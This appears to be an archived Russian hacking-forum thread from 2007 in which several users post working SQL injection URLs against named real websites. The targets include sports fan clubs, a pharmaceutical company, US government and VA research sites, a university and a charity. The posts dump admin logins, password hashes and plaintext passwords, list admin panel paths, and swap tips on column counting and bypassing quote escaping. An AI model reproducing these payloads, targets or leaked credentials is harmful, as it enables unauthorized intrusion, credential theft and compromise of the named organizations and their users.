ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.05.2007, 18:29
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql-not_finished
Незавершенное:
Сайт: http://www.password.ru/ (Каталог cайтов c красивым названием)
http://password.ru/sites.php?cat=16+and+1=0+union+select+1,2,3,concat _ws(user(),version(),database())/*
http://password.ru/admin/admin.php
Сайт: http://www.fc-arsenal.com/ (ARSSC: Официальный фан-клуб "Арсенала" в России)
http://www.fc-arsenal.com/index.php?page=news&id=-1289+union+select+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8/*
http://www.fc-arsenal.com/admin
Сайт: http://www.fcalania.ru/ (АЛАНСКИЕ БАРСЫ. Сайт болельщиков ФК АЛАНИЯ)
http://www.fcalania.ru/press/publication.php?id=-1930'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user (),version(),database())/*
Готовое
----------------------------------------------------------------- вопросик
Сайт: http://www.shinnik.yar.ru/ (Официальный сайт ФК Шинник)
поглядим на версию и улыбнемся, так как она пятая)
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1/*
смотрим таблицы через системную бд information_schema
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,table_name,3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1+from+information_schema.tables+ limit+125,1/*
и видим там таблицу nuke_users Но кавычки скринятся и не удается посмотреть названия полей в таблице -
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,column_name,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1+from+information_schema.column s+where+table_name='nuke_users'+limit+0,1/*
не проходит,
так вот вопрос - как это обойти, как изменить запрос, чтоб увидеть названия полей?
*админка недалеко, вперед и направо - http://www.shinnik.yar.ru/admin.php
upd. Скачал PostNuke, на котором построен сайт, посмотрел названия полей они все с префиксом pn_ так что
искомые поля - pn_uid,pn_uname,pn_pass,pn_email
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,concat_ws(0x3a,pn_uid,pn_uname ,pn_pass,pn_email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1+from+nuke_users+limit+1,1/*
2:admin:ff9830c42660c1dd1942844f8069b74a
Пароль админа очень многозначительный - root123
Вот, но вопрос в силе.
Последний раз редактировалось Серенький; 06.05.2007 в 18:56..
|
|
|
06.05.2007, 19:20
|
|
Участник форума
Регистрация: 11.01.2007
Сообщений: 125
Провел на форуме:
868251
Репутация:
27
|
|
http://www.eurohs.eu.com/front-end/news-full.php?id=-1'
http://www.neurope.eu/view_news.php?id=71989'
(либо я пропустил, либо столбцов больше 20...)
|
|
|
|
06.05.2007, 19:43
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
cont
Barney
используй order by
http://www.neurope.eu/view_news.php?id=71989 order by 73/* и ранее ошибки нет
http://www.neurope.eu/view_news.php?id=71989 order by 74/* - ошибка, и, значит, полей 73.
http://www.neurope.eu/view_news.php?id=-71989+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 ,1,2,3/*
http://www.eurohs.eu.com/front-end/news-full.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),v ersion(),database()),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 ,3,4/*
нашел users(username,password,user_id)
http://www.eurohs.eu.com/front-end/news-full.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_id, username,password),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 ,4+from+users/*
Последний раз редактировалось Серенький; 06.05.2007 в 19:52..
|
|
|
|
06.05.2007, 20:49
|
|
Новичок
Регистрация: 11.04.2006
Сообщений: 16
Провел на форуме:
485610
Репутация:
11
|
|
Компания Берлин Хеми
http://www.berlin-chemie.de/unt/news_detail.html?id=-286%20union+select+1,2,3,user(),5,6,7,8,9,10,11,12 ,13,14,15,16,17/*
http://www.berlin-chemie.de/unt/news_detail.html?id=-286%20union+select+1,2,Username,password,5,6,7,8,9 ,10,11,12,13,14,15,16,17+from+users+limit+0,1/*
http://www.berlin-chemie.de/admin
главный
login:administrator pass:jnkg2ew
отдельных разделов
inter la8z7eo
adm kjuhw2xy
jobs tw8fqx2
news x0el7ut
|
|
|
|
06.05.2007, 22:15
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
\\\от меня скуль\\\
Код:
http://www.technischerhandel.de/haendler/single.php?id=-1160+union+select+1,2,version(),4,database(),6,7,8,9,10,11,12,13,14,15,16+from+mysql.user/*
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
06.05.2007, 22:38
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
flydortmund.com
Код:
http://www.flydortmund.com/daten/in0_4.php?ALL_ID=-2+union+select+1,concat(user(),CHAR(58),VERSION()),3,4,5/*
www.nieuwsshow.nl
Код:
http://www.nieuwsshow.nl/PHP/all.php?all_ID=-1+UNION+SELECT+1,concat(user(),CHAR(58),VERSION()),3,4,5,6/*
|
|
|
|
06.05.2007, 22:51
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
EvoWeb
Код:
http://evonet.lri.fr/evoweb/news_events/news_features/article.php?id=-1111+UNION+SELECT+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,6,7,8,9,10,11,12+from+user+limit+0,1/*
лимитом крутить можно
_______________________
The Lesbian & Gay Foundation
Код:
http://www.lgf.org.uk/lgf_category.php?ID=-1111+UNION+SELECT+1,concat_ws(0x3a,username,password),3,4+from+users/*
admin  rangecat172006
Последний раз редактировалось maxster; 06.05.2007 в 23:47..
|
|
|
|
07.05.2007, 00:35
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508
Репутация:
1745
|
|
www.maineservicecommission.gov
Код:
http://www.maineservicecommission.gov/news/release.php?ID=-252+union+select+1,2,user(),version(),database(),6,7,8,9,10,11,12/*
таблицы: admin, news, user
админ панель: www.maineservicecommission.gov/hub/login.php
www.psat.wa.gov
Код:
http://www.psat.wa.gov/Publications/news_stories/hoodcanal_news_story.php?id=-131+union+select+1,2,3,4,convert(concat(user(),char(58),version(),char(58),database())+using+latin1),6,7,8+user/*
www.cherp.research.med.va.gov
Код:
http://www.cherp.research.med.va.gov/pr_read.php?id=-75+union+select+user(),2,version(),4,database(),6/*
таблицы: tbl_personnel, tbl_press_releases
www.y12.doe.gov
Код:
http://www.y12.doe.gov/news/release.php?id=-38+union+select+1,password,3,4,database(),6,version(),user(),user,10+from+mysql.user/*
www.serti.ru
Код:
http://www.serti.ru/pages.php?id=-2768+union+select+1,2,concat(user,0x3a,pass)+from+admin/*
dexm:dexmmm
Последний раз редактировалось KPOT_f!nd; 07.05.2007 в 00:38..
|
|
|
|
07.05.2007, 05:50
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
http://una.ge/eng/artdetail.php?group=articles&id=102%20UNION%20SELE CT%201,2,concat(loginname,0x3a,password),4,5,6,7,8 ,9%20from%20phplist_admin%20limit%201,1/*
или так
http://una.ge/eng/artdetail.php?group=articles&id=102%20UNION%20SELE CT%201,2,concat(name,0x3a,passwd),4,5,6,7,8,9%20fr om%20user%20limit%201,1/*
вот еще
http://rustavi2.com/news/news_text.php?id_news=20582%20UNION%20SELECT%201,2 ,3,4,5,usrname,pass,8,9,10,11,12%20from%20users_p% 20limit%201,1/*
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 07.05.2007 в 07:19..
|
|
|
|
07.05.2007, 13:12
|
|
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524
Репутация:
715
|
|
parametrix.ru
http://www.parametrix.ru/index.asp?idSort=1+or+1=(SELECT+TOP+1+TABLE_NAME+F ROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT +IN+('admin','clients','clients_id','Content','Dom ainPrices','Domains','dtproperties','forum_data',' forum_mails','forum_theme','forum_title','help','h osting','idClient','Links','Log','Mailer','Menu',' Meta','MetaLinks','News','paystat','paystat1','pot _clients','pot_kinds','property','support','SupTop icAnswers','SupTopics','sysconstraints','syssegmen ts','ue'))--&idPage=1
natalie arametrarametrix.ru
roma:romaarametrix.ru
parametrix:5086164
www.mc.uky.edu
http://www.mc.uky.edu/pharmacy/news_archive.asp?id=1'+or+1=(SELECT+TOP+1+TABLE_NA ME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME +NOT+IN+('CR_COURSE_INFO','AspNet_SqlCacheTablesFo rChangeNotification','BUILDING','CONTENT','CPST_Ad min','CPST_Clients','CPST_Employees','CPST_OF','CP ST_Projects','CR_COURSE_REVIEW','CR_FAC_INFO','DIV ISION','dtproperties','EMAILS','FAC_ADVISING','FAC _ADVISING_ROLE','FAC_ADVISING_STUDENT_TYPE','FAC_C ERTIFICATION','FAC_CONSULTING','FAC_EDADVISE','FAC _EDUCATION','FAC_EXPERIENCE'))--
http://www.mc.uky.edu/pharmacy/news_archive.asp?id=1'+or+1=(SELECT+TOP+1+cast(ID+ as+nvarchar)%2B%27%3A%27%2Bcast(username+as+nvarch ar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+ CPST_Admin+WHERE+ID=1)--
1:tasize0:test1
2:bloft2:cpst1admin
админки не нашел \=
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
